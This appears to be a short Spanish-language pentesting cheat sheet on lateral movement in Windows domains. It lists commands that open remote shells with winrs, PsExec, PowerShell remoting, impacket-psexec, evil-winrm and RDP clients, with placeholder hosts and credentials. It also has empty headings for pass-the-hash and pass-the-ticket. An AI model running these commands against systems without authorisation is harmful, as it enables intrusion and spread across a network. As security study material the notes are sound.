6. Siguientes pasos

6.1. Tenemos acceso?

winrs

winrs -r:<HOSTNAME> cmd

PsExec

.\\PsExec.exe \\\\<HOSTNAME> cmd

PS-Script

1- $sess = New-PSSession -ComputerName <HOST>
2- Enter-PSSession -Session $sess

Script Block

1- $sess = New-PSSession -ComputerName <HOST>
2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}

WSManWinRM

Invoke-WSManWinRM -hostname <HOST> -command cmd

6.2. Tenemos credenciales?

winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
.\\PsExec.exe -u <Domain>/<USER> -p <PASS> \\\\<HOSTNAME> cmd
impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>

#WSManWinRM
Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\\<USER> -password <PASS>

evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>

#RDP Access
rdesktop -a 16 <IP> -u <DOMAIN\\USER> -p <PASS>
xfreerdp /v:IP /u:"<USER>" /p:<PASS>

6.3. Pass The Hash

6.4. OverPass The Hash (OPTH) O Pass The Key (PTK)

6.5. Pass The Ticket (PTT)

Last updated

Was this helpful?